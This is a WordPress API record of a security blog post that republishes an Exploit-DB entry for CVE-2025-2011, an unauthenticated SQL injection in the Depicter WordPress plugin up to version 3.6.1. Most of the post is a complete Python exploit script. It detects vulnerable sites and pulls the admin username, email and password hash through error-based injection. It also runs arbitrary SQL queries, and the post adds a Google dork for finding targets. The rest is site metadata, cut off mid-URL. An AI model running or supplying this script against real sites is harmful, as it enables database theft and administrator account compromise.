{"id":3806,"date":"2025-05-09T14:43:19","date_gmt":"2025-05-09T14:43:19","guid":{"rendered":"http:\/\/localhost\/?p=3806"},"modified":"2025-05-09T14:43:19","modified_gmt":"2025-05-09T14:43:19","slug":"wordpress-depicter-plugin-361-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=3806","title":{"rendered":"WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52285<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-09T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-09T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">7.5<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-2011<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection Google Dork: inurl:\/wp-content\/plugins\/depicter\/ Date: 2025-05-06 Exploit Author: Andrew Long&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection<br \/>\n<br \/># Google Dork: inurl:\/wp-content\/plugins\/depicter\/<br \/>\n<br \/># Date: 2025-05-06<br \/>\n<br \/># Exploit Author: Andrew Long (datagoboom)<br \/>\n<br \/># Vendor Homepage: https:\/\/wordpress.org\/plugins\/depicter\/<br \/>\n<br \/># Software Link: https:\/\/downloads.wordpress.org\/plugin\/depicter.3.6.1.zip<br \/>\n<br \/># Version: <= 3.6.1\n<br \/># Tested on: WordPress 6.x<br \/>\n<br \/># CVE: CVE-2025-2011<\/p>\n<p># Description:<br \/>\n<br \/># The Slider &#038; Popup Builder by Depicter plugin for WordPress is vulnerable to SQL Injection via the &#8216;s&#8217; parameter in all versions up to, and including, 3.6.1.<br \/>\n<br \/># The vulnerability exists due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.<br \/>\n<br \/># This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.<\/p>\n<p># The vulnerability is located in the admin-ajax.php endpoint and can be exploited through the &#8216;s&#8217; parameter. The PoC demonstrates how to:<br \/>\n<br \/># 1. Check if a target is vulnerable<br \/>\n<br \/># 2. Extract admin user details<br \/>\n<br \/># 3. Execute custom SQL queries<\/p>\n<p># The exploit is provided as a Python script (poc.py) that includes:<br \/>\n<br \/># &#8211; Error-based SQL injection detection<br \/>\n<br \/># &#8211; Admin user information extraction<br \/>\n<br \/># &#8211; Custom SQL query execution capability<br \/>\n<br \/># &#8211; Debug mode for detailed output<\/p>\n<p>#!\/usr\/bin\/env python3<\/p>\n<p>import argparse<br \/>\n<br \/>import re<br \/>\n<br \/>import sys<br \/>\n<br \/>import time<br \/>\n<br \/>import html<br \/>\n<br \/>import urllib.parse<br \/>\n<br \/>from urllib.parse import urlparse<\/p>\n<p>try:<br \/>\n<br \/>    import requests<br \/>\n<br \/>    from colorama import Fore, Style, init<br \/>\n<br \/>    init(autoreset=True)<br \/>\n<br \/>    USE_COLOR = True<br \/>\n<br \/>except ImportError:<br \/>\n<br \/>    class MockColorama:<br \/>\n<br \/>        def __getattr__(self, name):<br \/>\n<br \/>            return &#8220;&#8221;<\/p>\n<p>    Fore = Style = MockColorama()<br \/>\n<br \/>    USE_COLOR = False<\/p>\n<p>    print(&#8220;[!] Missing dependencies. Install with: pip install requests colorama&#8221;)<br \/>\n<br \/>    print(&#8220;[!] Continuing without colored output&#8230;&#8221;)<\/p>\n<p>def print_banner():<br \/>\n<br \/>    banner = f&#8221;&#8221;&#8221;<br \/>\n<br \/>{Fore.CYAN}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557<br \/>\n<br \/>{Fore.CYAN}\u2551 {Fore.RED}CVE-2025-2011 &#8211; SQLi in Depicter Slider &#038; Popup Builder <3.6.2 {Fore.CYAN}\u2551\n<br \/>{Fore.CYAN}\u2551 {Fore.GREEN}By datagoboom                                          {Fore.CYAN}        \u2551<br \/>\n<br \/>{Fore.CYAN}\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}<br \/>\n<br \/>    &#8220;&#8221;&#8221;<br \/>\n<br \/>    print(banner)<\/p>\n<p>def verify_target(url):<br \/>\n<br \/>    parsed_url = urlparse(url)<br \/>\n<br \/>    if not parsed_url.scheme:<br \/>\n<br \/>        url = &#8220;http:\/\/&#8221; + url<br \/>\n<br \/>    if url.endswith(&#8216;\/&#8217;):<br \/>\n<br \/>        url = url[:-1]<\/p>\n<p>    print(f&#8221;{Fore.YELLOW}[*] Target URL: {url}&#8221;)<br \/>\n<br \/>    return url<\/p>\n<p>def test_connection(url):<br \/>\n<br \/>    try:<br \/>\n<br \/>        response = requests.get(url, timeout=10)<br \/>\n<br \/>        if response.status_code == 200:<br \/>\n<br \/>            print(f&#8221;{Fore.GREEN}[+] Successfully connected to the target&#8221;)<br \/>\n<br \/>            return True<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(f&#8221;{Fore.RED}[-] Received status code {response.status_code}&#8221;)<br \/>\n<br \/>            return False<br \/>\n<br \/>    except requests.exceptions.RequestException as e:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[-] Connection error: {e}&#8221;)<br \/>\n<br \/>        return False<\/p>\n<p>def extract_data(url, sql_query, max_length=50, debug=False):<br \/>\n<br \/>    payload = f&#8221;test%&#8217; AND EXTRACTVALUE(1,CONCAT(0x7e,({sql_query}),0x7e))=&#8217;&#038;perpage=20&#038;page=1&#038;orderBy=source_id&#038;dateEnd=&#038;dateStart=&#038;order=DESC&#038;sources=&#038;action=depicter-lead-index&#8221;<\/p>\n<p>    target_url = f&#8221;{url}\/wp-admin\/admin-ajax.php?s={payload}&#8221;<\/p>\n<p>    try:<br \/>\n<br \/>        if debug:<br \/>\n<br \/>            print(f&#8221;{Fore.BLUE}[DEBUG] Requesting: {target_url}&#8221;)<\/p>\n<p>        response = requests.get(target_url, timeout=20)<\/p>\n<p>        if debug:<br \/>\n<br \/>            print(f&#8221;{Fore.BLUE}[DEBUG] Response status: {response.status_code}&#8221;)<\/p>\n<p>        decoded_text = html.unescape(response.text)<\/p>\n<p>        error_pattern = r&#8221;XPATH syntax error: &#8216;~(.*?)~'&#8221;<br \/>\n<br \/>        match = re.search(error_pattern, decoded_text)<\/p>\n<p>        if match:<br \/>\n<br \/>            extracted_data = match.group(1)<br \/>\n<br \/>            return extracted_data<br \/>\n<br \/>        else:<br \/>\n<br \/>            if debug:<br \/>\n<br \/>                print(f&#8221;{Fore.RED}[-] No XPATH syntax error found in response&#8221;)<br \/>\n<br \/>                if &#8220;XPATH syntax error&#8221; in decoded_text:<br \/>\n<br \/>                    print(f&#8221;{Fore.RED}[-] XPATH error found but regex didn&#8217;t match. Response excerpt:&#8221;)<br \/>\n<br \/>                    print(f&#8221;{Fore.RED}[-] {decoded_text[:500]}&#8221;)<br \/>\n<br \/>                else:<br \/>\n<br \/>                    print(f&#8221;{Fore.RED}[-] Response doesn&#8217;t contain XPATH error. Response excerpt:&#8221;)<br \/>\n<br \/>                    print(f&#8221;{Fore.RED}[-] {decoded_text[:500]}&#8221;)<br \/>\n<br \/>            return None<br \/>\n<br \/>    except requests.exceptions.RequestException as e:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[-] Error during extraction: {e}&#8221;)<br \/>\n<br \/>        return None<\/p>\n<p>def check_vulnerability(url, debug=False):<br \/>\n<br \/>    print(f&#8221;{Fore.YELLOW}[*] Checking if the target is vulnerable&#8230;&#8221;)<\/p>\n<p>    result = extract_data(url, &#8220;database()&#8221;, debug=debug)<\/p>\n<p>    if result:<br \/>\n<br \/>        print(f&#8221;{Fore.GREEN}[+] Target is VULNERABLE!&#8221;)<br \/>\n<br \/>        print(f&#8221;{Fore.GREEN}[+] Database name: {result}&#8221;)<br \/>\n<br \/>        return True<br \/>\n<br \/>    else:<br \/>\n<br \/>        result = extract_data(url, &#8220;VERSION()&#8221;, debug=debug)<br \/>\n<br \/>        if result:<br \/>\n<br \/>            print(f&#8221;{Fore.GREEN}[+] Target is VULNERABLE!&#8221;)<br \/>\n<br \/>            print(f&#8221;{Fore.GREEN}[+] MySQL version: {result}&#8221;)<br \/>\n<br \/>            return True<br \/>\n<br \/>        else:<br \/>\n<br \/>            result = extract_data(url, &#8220;&#8216;test'&#8221;, debug=debug)<br \/>\n<br \/>            if result:<br \/>\n<br \/>                print(f&#8221;{Fore.GREEN}[+] Target is VULNERABLE!&#8221;)<br \/>\n<br \/>                print(f&#8221;{Fore.GREEN}[+] Test value: {result}&#8221;)<br \/>\n<br \/>                return True<br \/>\n<br \/>            else:<br \/>\n<br \/>                print(f&#8221;{Fore.RED}[-] Target does not appear to be vulnerable&#8221;)<br \/>\n<br \/>                manual_check = f&#8221;{url}\/wp-admin\/admin-ajax.php?s=test%&#8217; AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))=&#8217;&#038;perpage=20&#038;page=1&#038;orderBy=source_id&#038;dateEnd=&#038;dateStart=&#038;order=DESC&#038;sources=&#038;action=depicter-lead-index&#8221;<br \/>\n<br \/>                print(f&#8221;{Fore.YELLOW}[*] Try checking manually in your browser: \\n{manual_check}&#8221;)<br \/>\n<br \/>                return False<\/p>\n<p>def extract_admin_details(url, debug=False):<br \/>\n<br \/>    print(f&#8221;{Fore.YELLOW}[*] Extracting admin user details&#8230;&#8221;)<\/p>\n<p>    admin_username = extract_data(url, &#8220;SELECT user_login FROM wp_users WHERE ID=1 LIMIT 1&#8221;, debug=debug)<\/p>\n<p>    if admin_username:<br \/>\n<br \/>        print(f&#8221;{Fore.GREEN}[+] Admin username: {admin_username}&#8221;)<\/p>\n<p>        admin_email = extract_data(url, &#8220;SELECT user_email FROM wp_users WHERE ID=1 LIMIT 1&#8221;, debug=debug)<br \/>\n<br \/>        if admin_email:<br \/>\n<br \/>            print(f&#8221;{Fore.GREEN}[+] Admin email: {admin_email}&#8221;)<\/p>\n<p>        hash_left = extract_data(url, &#8220;SELECT LEFT(user_pass,30) FROM wp_users WHERE ID=1 LIMIT 1&#8221;, debug=debug)<br \/>\n<br \/>        if hash_left:<br \/>\n<br \/>            hash_right = extract_data(url, &#8220;SELECT SUBSTRING(user_pass,31,30) FROM wp_users WHERE ID=1 LIMIT 1&#8221;, debug=debug)<br \/>\n<br \/>            if hash_right:<br \/>\n<br \/>                full_hash = hash_left + hash_right<br \/>\n<br \/>            else:<br \/>\n<br \/>                print(f&#8221;{Fore.YELLOW}[*] Could not retrieve full hash &#8211; bcrypt hashes are typically 60 chars long&#8221;)<br \/>\n<br \/>            print(f&#8221;{Fore.GREEN}[+] Admin password hash: {full_hash}&#8221;)<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(f&#8221;{Fore.RED}[-] Failed to extract admin password hash&#8221;)<\/p>\n<p>        return {<br \/>\n<br \/>            &#8220;username&#8221;: admin_username,<br \/>\n<br \/>            &#8220;email&#8221;: admin_email,<br \/>\n<br \/>            &#8220;password_hash&#8221;: hash_left<br \/>\n<br \/>        }<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[-] Failed to extract admin details&#8221;)<br \/>\n<br \/>        return None<\/p>\n<p>def extract_custom_data(url, query, debug=False):<br \/>\n<br \/>    print(f&#8221;{Fore.YELLOW}[*] Executing custom SQL query&#8230;&#8221;)<br \/>\n<br \/>    print(f&#8221;{Fore.YELLOW}[*] Query: {query}&#8221;)<\/p>\n<p>    result = extract_data(url, query, debug=debug)<\/p>\n<p>    if result:<br \/>\n<br \/>        print(f&#8221;{Fore.GREEN}[+] Result: {result}&#8221;)<br \/>\n<br \/>        return result<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[-] Failed to execute query or no results returned&#8221;)<br \/>\n<br \/>        return None<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(description=&#8217;CVE-2025-2011 &#8211; SQLi in Depicter Slider &#038; Popup Builder&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;url&#8217;, required=True, help=&#8217;Target WordPress URL&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;-m&#8217;, &#8216;&#8211;mode&#8217;, default=&#8217;check&#8217;, choices=[&#8216;check&#8217;, &#8216;admin&#8217;, &#8216;custom&#8217;],<br \/>\n<br \/>                      help=&#8217;Extraction mode: check=vulnerability check, admin=admin details, custom=custom SQL query&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;-q&#8217;, &#8216;&#8211;query&#8217;, help=&#8217;Custom SQL query (use with -m custom)&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;-d&#8217;, &#8216;&#8211;debug&#8217;, action=&#8217;store_true&#8217;, help=&#8217;Enable debug output&#8217;)<\/p>\n<p>    args = parser.parse_args()<\/p>\n<p>    print_banner()<\/p>\n<p>    target_url = verify_target(args.url)<\/p>\n<p>    if not test_connection(target_url):<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[-] Exiting due to connection failure&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>    if not check_vulnerability(target_url, debug=args.debug):<br \/>\n<br \/>        if args.mode != &#8216;check&#8217;:<br \/>\n<br \/>            print(f&#8221;{Fore.YELLOW}[!] Target may not be vulnerable, but continuing with requested mode&#8230;&#8221;)<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(f&#8221;{Fore.RED}[-] Exiting as target does not appear to be vulnerable&#8221;)<br \/>\n<br \/>            sys.exit(1)<\/p>\n<p>    if args.mode == &#8216;check&#8217;:<br \/>\n<br \/>        pass<br \/>\n<br \/>    elif args.mode == &#8216;admin&#8217;:<br \/>\n<br \/>        extract_admin_details(target_url, debug=args.debug)<br \/>\n<br \/>    elif args.mode == &#8216;custom&#8217;:<br \/>\n<br \/>        if not args.query:<br \/>\n<br \/>            print(f&#8221;{Fore.RED}[-] Custom mode requires a SQL query (-q\/&#8211;query)&#8221;)<br \/>\n<br \/>            sys.exit(1)<br \/>\n<br \/>        extract_custom_data(target_url, args.query, debug=args.debug)<\/p>\n<p>    print(f&#8221;\\n{Fore.YELLOW}[!] Exploitation complete&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52285\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection Exploit ID EDB-ID:52285 Type exploitdb Published 2025-05-09T00:00:00 Modified 2025-05-09T00:00:00 CVSS Information CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,40,15,13,7,11,5],"class_list":["post-3806","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WordPress Depicter Plugin 3.6.1 - SQL Injection - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=3806\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Depicter Plugin 3.6.1 - SQL Injection - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection Exploit ID EDB-ID:52285 Type exploitdb Published 2025-05-09T00:00:00 Modified 2025-05-09T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=3806\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-09T14:43:19+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection\",\"datePublished\":\"2025-05-09T14:43:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806\"},\"wordCount\":123,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3806#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806\",\"name\":\"WordPress Depicter Plugin 3.6.1 - SQL Injection - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-09T14:43:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3806\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3806#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress Depicter Plugin 3.6.1 - SQL Injection - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=3806","og_locale":"en_US","og_type":"article","og_title":"WordPress Depicter Plugin 3.6.1 - SQL Injection - zero redgem","og_description":"Exploit Details Basic Information Exploit Title WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection Exploit ID EDB-ID:52285 Type exploitdb Published 2025-05-09T00:00:00 Modified 2025-05-09T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=3806","og_site_name":"zero redgem","article_published_time":"2025-05-09T14:43:19+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=3806#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=3806"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection","datePublished":"2025-05-09T14:43:19+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=3806"},"wordCount":123,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=3806#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=3806","url":"https:\/\/zero.redgem.net\/?p=3806","name":"WordPress Depicter Plugin 3.6.1 - SQL Injection - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-09T14:43:19+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=3806#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=3806"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=3806#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress Depicter Plugin 3.6.1 &#8211; SQL Injection"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3806"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3806\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3806"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/z